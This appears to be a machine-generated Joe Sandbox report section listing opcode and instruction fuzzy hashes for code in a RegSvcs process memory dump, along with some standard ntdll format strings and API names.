                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 56312fac2d2b2380c3cb68f0172bc1dd3a190d04830bc84ff3f7a2ecfef50827
                                                                  • Instruction ID: fbeb6e38e0f15ba1485f91c0f5dd7b6aab7dbfd053700c4e38834fbb000bb550
                                                                  • Opcode Fuzzy Hash: 56312fac2d2b2380c3cb68f0172bc1dd3a190d04830bc84ff3f7a2ecfef50827
                                                                  • Instruction Fuzzy Hash: 58900225212400030105B95C0B08507008A97D5351355C121F5015A50DD62189615221
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 8cf2e0f3088c46ffa7ca1e00f10da82aa7cda15a0ecd4e2ee0becc191265d21d
                                                                  • Instruction ID: 701465d613ce9c61df5ae903ff70ee9e306711b72378145b538d3bc9442f934d
                                                                  • Opcode Fuzzy Hash: 8cf2e0f3088c46ffa7ca1e00f10da82aa7cda15a0ecd4e2ee0becc191265d21d
                                                                  • Instruction Fuzzy Hash: B69002A1202540924500B65C8808B0B454997E0201B55C116E5054A60DC52589519235
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 1f380e631a054fce5f31e0dba60fe83de2555647c23ba7bc430387177d429139
                                                                  • Instruction ID: 486a48874a061be682f80485b46ce9e1ea673ed063d4ed8d84277817219d411a
                                                                  • Opcode Fuzzy Hash: 1f380e631a054fce5f31e0dba60fe83de2555647c23ba7bc430387177d429139
                                                                  • Instruction Fuzzy Hash: C790022130240003D140755C581C6074049E7E1301F55D111E4414A54DD91589565322
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: fb85231a4ea2a2ee70949be8eed487bff8c8f1be5365a3b95f1fcdc10b3b456e
                                                                  • Instruction ID: d6db4e49971f0015f753f2fa5e2880271e61bb6bce6948ddd62a7fe9c952ab98
                                                                  • Opcode Fuzzy Hash: fb85231a4ea2a2ee70949be8eed487bff8c8f1be5365a3b95f1fcdc10b3b456e
                                                                  • Instruction Fuzzy Hash: 9190022120644442D100795C580CA07004997D0205F55D111A5064A95EC6358951A231
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 35a5303cb6c4ced375794af06624ec8f99c8f90e57fdbca4daf47f1d13968305
                                                                  • Instruction ID: ce7f9a152cea4fc617bb2d5185193958331a3c5bc099e764255080d609a79892
                                                                  • Opcode Fuzzy Hash: 35a5303cb6c4ced375794af06624ec8f99c8f90e57fdbca4daf47f1d13968305
                                                                  • Instruction Fuzzy Hash: 2590022921340002D180755C580C60B004997D1202F95D515A4015A58DC91589695321
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 80f02b445fb442c1b7bd36d84eeac7f9fcd182bf0f080dca008a392465f11b7d
                                                                  • Instruction ID: 418ae42a3089299a258ac27baf409d198cb57903cb854c0114405629dfbc5d13
                                                                  • Opcode Fuzzy Hash: 80f02b445fb442c1b7bd36d84eeac7f9fcd182bf0f080dca008a392465f11b7d
                                                                  • Instruction Fuzzy Hash: DB900221243441525545B55C4808507404AA7E0241795C112A5414E50DC5269956D721
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 6d07cf56fdedd0b8de7b697c59c84f26bb34a8c17542031c817c8f5d0586e35e
                                                                  • Instruction ID: c2d4875835202249071c6a66e61a2878d8394771e725bca2dd2aa50459ae8cc3
                                                                  • Opcode Fuzzy Hash: 6d07cf56fdedd0b8de7b697c59c84f26bb34a8c17542031c817c8f5d0586e35e
                                                                  • Instruction Fuzzy Hash: B690023124240402D141755C4808607004DA7D0241F95C112A4424A54FC6558B56AB61
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 98d23e713f534060552b423b5143de9e97882afe6323c4b2698f95a80f72be3b
                                                                  • Instruction ID: 15aab3dfc6eb210d79a611325900e5cd1e88454b55911327b49d8e5d947796ae
                                                                  • Opcode Fuzzy Hash: 98d23e713f534060552b423b5143de9e97882afe6323c4b2698f95a80f72be3b
                                                                  • Instruction Fuzzy Hash: 5390023120240842D100755C4808B47004997E0301F55C116A4124B54EC615C9517621
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 55595206b0649f4790657c5c5774f745633cb44aa01326f8a473034714d60f64
                                                                  • Instruction ID: 0cbb256049feda6ee57826decaae356b8c4ba4b9cca100548cf436e926352f7a
                                                                  • Opcode Fuzzy Hash: 55595206b0649f4790657c5c5774f745633cb44aa01326f8a473034714d60f64
                                                                  • Instruction Fuzzy Hash: E090023120240403D100755C590C707004997D0201F55D511A4424A58ED65689516221
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 84df24cac2e7d29224d3a14f7ef3a782d04ca038bace5624c338776364492f08
                                                                  • Instruction ID: f704e51f2afb24ec5544675b4a581932c02d94c67a0bb58546025a2d23608f54
                                                                  • Opcode Fuzzy Hash: 84df24cac2e7d29224d3a14f7ef3a782d04ca038bace5624c338776364492f08
                                                                  • Instruction Fuzzy Hash: E990022160640402D140755C581C707005997D0201F55D111A4024A54EC6598B5567A1
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: cb5c4f87f0557e3b8cbba655bf335e612aa16621cc4455f2c41c5335f078c770
                                                                  • Instruction ID: b869a1ab81f0159d3bc93521e73188a656c628a9c7296d392623c7fcea6c0567
                                                                  • Opcode Fuzzy Hash: cb5c4f87f0557e3b8cbba655bf335e612aa16621cc4455f2c41c5335f078c770
                                                                  • Instruction Fuzzy Hash: 0690023120240402D100799C580C647004997E0301F55D111A9024A55FC66589916231
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: d42ef9aac62eb017d5997ed372fda4345b7f09cab7e3dc03a7838083668e8b2f
                                                                  • Instruction ID: ea9a54c076c2736ed19a7cb4ccd9eb3caf8d221ffc09f17832a377a2f9085e0d
                                                                  • Opcode Fuzzy Hash: d42ef9aac62eb017d5997ed372fda4345b7f09cab7e3dc03a7838083668e8b2f
                                                                  • Instruction Fuzzy Hash: 1C90026121240042D104755C4808707008997E1201F55C112A6154A54DC5298D615225
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 2530e939302d9fd051c47d8e930df695ebf47f879de73625fbd268752f79ecee
                                                                  • Instruction ID: 894fb6dcd607ecbc9c3c32ff19d910e98946b7c5981f91292ffd82e02673c878
                                                                  • Opcode Fuzzy Hash: 2530e939302d9fd051c47d8e930df695ebf47f879de73625fbd268752f79ecee
                                                                  • Instruction Fuzzy Hash: 9190026134240442D100755C4818B070049D7E1301F55C115E5064A54EC619CD526226
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 3543112da6bfae4f6f66d41d655e33e9f5c7ed4edd5f43d96dd0cc0c7ba0308b
                                                                  • Instruction ID: 900fd6575e1e75818f0791e95d4b5c32515afb8c8203a722667dcf976d8474a8
                                                                  • Opcode Fuzzy Hash: 3543112da6bfae4f6f66d41d655e33e9f5c7ed4edd5f43d96dd0cc0c7ba0308b
                                                                  • Instruction Fuzzy Hash: 26900221212C0042D200796C4C18B07004997D0303F55C215A4154A54DC91589615621
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 23dc9fd0a8caacae10cdbd5a3e2da546417696d574da966b1d8cf7e98fc84a3f
                                                                  • Instruction ID: 648bb8252994846ce491aec10fda6e9a317f47828dcfb7b96a03b2446a43f20f
                                                                  • Opcode Fuzzy Hash: 23dc9fd0a8caacae10cdbd5a3e2da546417696d574da966b1d8cf7e98fc84a3f
                                                                  • Instruction Fuzzy Hash: 2490023120280402D100755C4C0C747004997D0302F55C111A9164A55FC665C9916631
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 89f1a4405f72e291a89a7dafb9004d2662c3b86bf44f96945a61ed08fdb4f16e
                                                                  • Instruction ID: 032bc80fc6fa715cf7073b431599936399b43ccdea7155d039d0274f888f9db8
                                                                  • Opcode Fuzzy Hash: 89f1a4405f72e291a89a7dafb9004d2662c3b86bf44f96945a61ed08fdb4f16e
                                                                  • Instruction Fuzzy Hash: 46900221602400424140756C8C489074049BBE1211755C221A4998A50EC55989655765
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 0650588a588db1002619b38651c36776b399351fd4cdc2b6fa38468738038dcb
                                                                  • Instruction ID: b5b4ae7d2cbc1f6114c3a5438c225eb048d3008c4537e38c9c71ad3a7c85bc2e
                                                                  • Opcode Fuzzy Hash: 0650588a588db1002619b38651c36776b399351fd4cdc2b6fa38468738038dcb
                                                                  • Instruction Fuzzy Hash: 7190023120280402D100755C4C1870B004997D0302F55C111A5164A55EC62589516671
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 9f71a80defbf88f29a3dc48191cd392992757525c9aba9bab79df47437def5d0
                                                                  • Instruction ID: 647220fea09f81b03be9b0750c41e3fe8ae09ebd120804047654dcc217af34bb
                                                                  • Opcode Fuzzy Hash: 9f71a80defbf88f29a3dc48191cd392992757525c9aba9bab79df47437def5d0
                                                                  • Instruction Fuzzy Hash: 4690022130240402D102755C4818607004DD7D1345F95C112E5424A55EC6258A53A232
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: a804f8c89b793c2a9a64b755f824a0d3210f7035dfd518fbda72560cce463192
                                                                  • Instruction ID: 73d9b1a9abc0de124fff56b5e22687d51ae209ce7fc866932e9cd977816fe1cb
                                                                  • Opcode Fuzzy Hash: a804f8c89b793c2a9a64b755f824a0d3210f7035dfd518fbda72560cce463192
                                                                  • Instruction Fuzzy Hash: 1490026120280403D140795C4C08607004997D0302F55C111A6064A55FCA298D516235
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: bf8668be4a279b30cd6ecd605d2e3dc122e7712b15152121aa696e2de47c5634
                                                                  • Instruction ID: 03d078a4c6a0c86822d3fef07523c463c000270fd9f2fe8087c0e946f4b3ec36
                                                                  • Opcode Fuzzy Hash: bf8668be4a279b30cd6ecd605d2e3dc122e7712b15152121aa696e2de47c5634
                                                                  • Instruction Fuzzy Hash: 7590027120240402D140755C4808747004997D0301F55C111A9064A54FC6598ED56765
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: e3d49fd3ab94f20b9436bbb5624fcca112c583c843724aa3af3d7a6e8c11b5f2
                                                                  • Instruction ID: 08d7d9b25f7e0e8903b82d98c4785996383126a72bce5afa846d8425b377df2e
                                                                  • Opcode Fuzzy Hash: e3d49fd3ab94f20b9436bbb5624fcca112c583c843724aa3af3d7a6e8c11b5f2
                                                                  • Instruction Fuzzy Hash: 7990022160240502D101755C4808617004E97D0241F95C122A5024A55FCA258A92A231
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 7e6f732da4fa97c60693a8f9ff833ce2f8fb606613137d038bd49986d9911985
                                                                  • Instruction ID: abda881e26f87180bd3075001964406442059f563fab1e071ff1154d29ad5777
                                                                  • Opcode Fuzzy Hash: 7e6f732da4fa97c60693a8f9ff833ce2f8fb606613137d038bd49986d9911985
                                                                  • Instruction Fuzzy Hash: 1A90022120284442D140765C4C08B0F414997E1202F95C119A8156A54DC91589555721
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 0b14a73f97374571b0f1897f2c5824d982384138a91c468bfb58d6d163e51593
                                                                  • Instruction ID: e7455696b937326ffb042207b8b1d10aa8f978fac1d165261194e7d6175c8ea8
                                                                  • Opcode Fuzzy Hash: 0b14a73f97374571b0f1897f2c5824d982384138a91c468bfb58d6d163e51593
                                                                  • Instruction Fuzzy Hash: 0D90022124240802D140755C8818707004AD7D0601F55C111A4024A54EC6168A6567B1
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 73e12e5ad9699eedcfb088b9db93c3f4de55bae099972f300ebeddea60c39cca
                                                                  • Instruction ID: 3460fb6c8b25ad5ac81b6f9e78c528e8ec355e4ec7ca9872febedda09ccb6ac1
                                                                  • Opcode Fuzzy Hash: 73e12e5ad9699eedcfb088b9db93c3f4de55bae099972f300ebeddea60c39cca
                                                                  • Instruction Fuzzy Hash: 2A90022124645102D150755C48086174049B7E0201F55C121A4814A94EC55589556321
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 5342170ea9e2aa259bd4b8ef8eea89b2acbb8d3241fcf6ed314ebf0822712293
                                                                  • Instruction ID: 8e594a7eab151b52a3446de99748328de2428a7f017775ed50916df994a6d803
                                                                  • Opcode Fuzzy Hash: 5342170ea9e2aa259bd4b8ef8eea89b2acbb8d3241fcf6ed314ebf0822712293
                                                                  • Instruction Fuzzy Hash: F790023520240402D510755C5C08647008A97D0301F55D511A4424A58EC65489A1A221
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: f02340d9bc93501fa9435021984d4b6307dfa971bf95222abb457039ee034ced
                                                                  • Instruction ID: 1476b6714a0eeca650cedcde0bb6f56927ce0772fce1697301096b440ee04ca9
                                                                  • Opcode Fuzzy Hash: f02340d9bc93501fa9435021984d4b6307dfa971bf95222abb457039ee034ced
                                                                  • Instruction Fuzzy Hash: D1900231203401429540765C5C08A4F414997E1302B95D515A4015A54DC91489615321
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                  • Instruction ID: 6f6ad15721a741acbce91f24dcc87f3e22b429fe3d4e0ed3ea8c24ce9bbeb85f
                                                                  • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                  • Instruction Fuzzy Hash:
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID: ___swprintf_l
                                                                  • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                  • API String ID: 48624451-2108815105
                                                                  • Opcode ID: ac817041f64bb976dce5b8531afb7a4e8226deadb2cedf5eb9e7ac562ad14299
                                                                  • Instruction ID: 90acc863a166885aa9b7aab1e1fd5793e7d51a71814bb781c1cad1934677c31c
                                                                  • Opcode Fuzzy Hash: ac817041f64bb976dce5b8531afb7a4e8226deadb2cedf5eb9e7ac562ad14299
                                                                  • Instruction Fuzzy Hash: 9D51D4A6E04216AECB21DB9DCCA097EFBF8BB48240B10826DE565D7641D374DE5487E0
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID: ___swprintf_l
                                                                  • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                  • API String ID: 48624451-2108815105
                                                                  • Opcode ID: ecd555176242f96421d4d6c2f50233fb40f5b72c8e58ee84807cbbfd9d891527
                                                                  • Instruction ID: 186bf3990e90f4a60354489d518564dffced88ba61adb237198e16ac71c5c52d
                                                                  • Opcode Fuzzy Hash: ecd555176242f96421d4d6c2f50233fb40f5b72c8e58ee84807cbbfd9d891527
                                                                  • Instruction Fuzzy Hash: E551E375A00646ABCB20DE9CDD9097FFBF9EF44200B148499F596C7642EBB4DA1087A0
                                                                  Strings
                                                                  • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01704742
                                                                  • CLIENT(ntdll): Processing section info %ws..., xrefs: 01704787
                                                                  • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01704725
                                                                  • ExecuteOptions, xrefs: 017046A0
                                                                  • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 017046FC
                                                                  • Execute=1, xrefs: 01704713
                                                                  • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01704655
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                  • API String ID: 0-484625025
                                                                  • Opcode ID: 7f69fdd3a1874b7762595c71e60453e17a229bb68cfab1aaf22034ebbf1ebe19
                                                                  • Instruction ID: 248d913d81470bb8f0a787eb584cd23d466d2da2b7128adc9210b6d8c958827e
                                                                  • Opcode Fuzzy Hash: 7f69fdd3a1874b7762595c71e60453e17a229bb68cfab1aaf22034ebbf1ebe19
                                                                  • Instruction Fuzzy Hash: EB513B31A00229BAEF11EBA9DC89FFDB7A9EF15700F14009DD606A72C1E7719E458F54
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                                                  • Instruction ID: c2e5fb7fb13e178a9785d3eb712061ed3b48ab11354a13088b58b1419f0703bc
                                                                  • Opcode Fuzzy Hash: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                                                  • Instruction Fuzzy Hash: 9F021671508342AFD305CF18C894A6BFBE9EFC8704F548A6DF9898B264DB31E945CB42
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID: __aulldvrm
                                                                  • String ID: +$-$0$0
                                                                  • API String ID: 1302938615-699404926
                                                                  • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                  • Instruction ID: cc4ea423fd65e23e77bf6077ab55f635291a92768cd23f900ac6fa51d1a2158e
                                                                  • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                  • Instruction Fuzzy Hash: D981D030E052999FEF258E6CCC917FEBBB2AF46360F1F4119D861A7399C73488418B55
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID: ___swprintf_l
                                                                  • String ID: %%%u$[$]:%u
                                                                  • API String ID: 48624451-2819853543
                                                                  • Opcode ID: a9df07b1b70c3a5fc52b6c489b0ae6c34d83544da7864318025fed28726e2bab
                                                                  • Instruction ID: 66937214e8a55643d625125b498a92b0324a62bb047766a08bcdd614360b1981
                                                                  • Opcode Fuzzy Hash: a9df07b1b70c3a5fc52b6c489b0ae6c34d83544da7864318025fed28726e2bab
                                                                  • Instruction Fuzzy Hash: 7221517AE00119ABDB10EF69DC44ABEBBE9EF54650F14012AF905E3201EB30DA11CBA5
                                                                  Strings
                                                                  • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 017002E7
                                                                  • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 017002BD
                                                                  • RTL: Re-Waiting, xrefs: 0170031E
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                  • API String ID: 0-2474120054
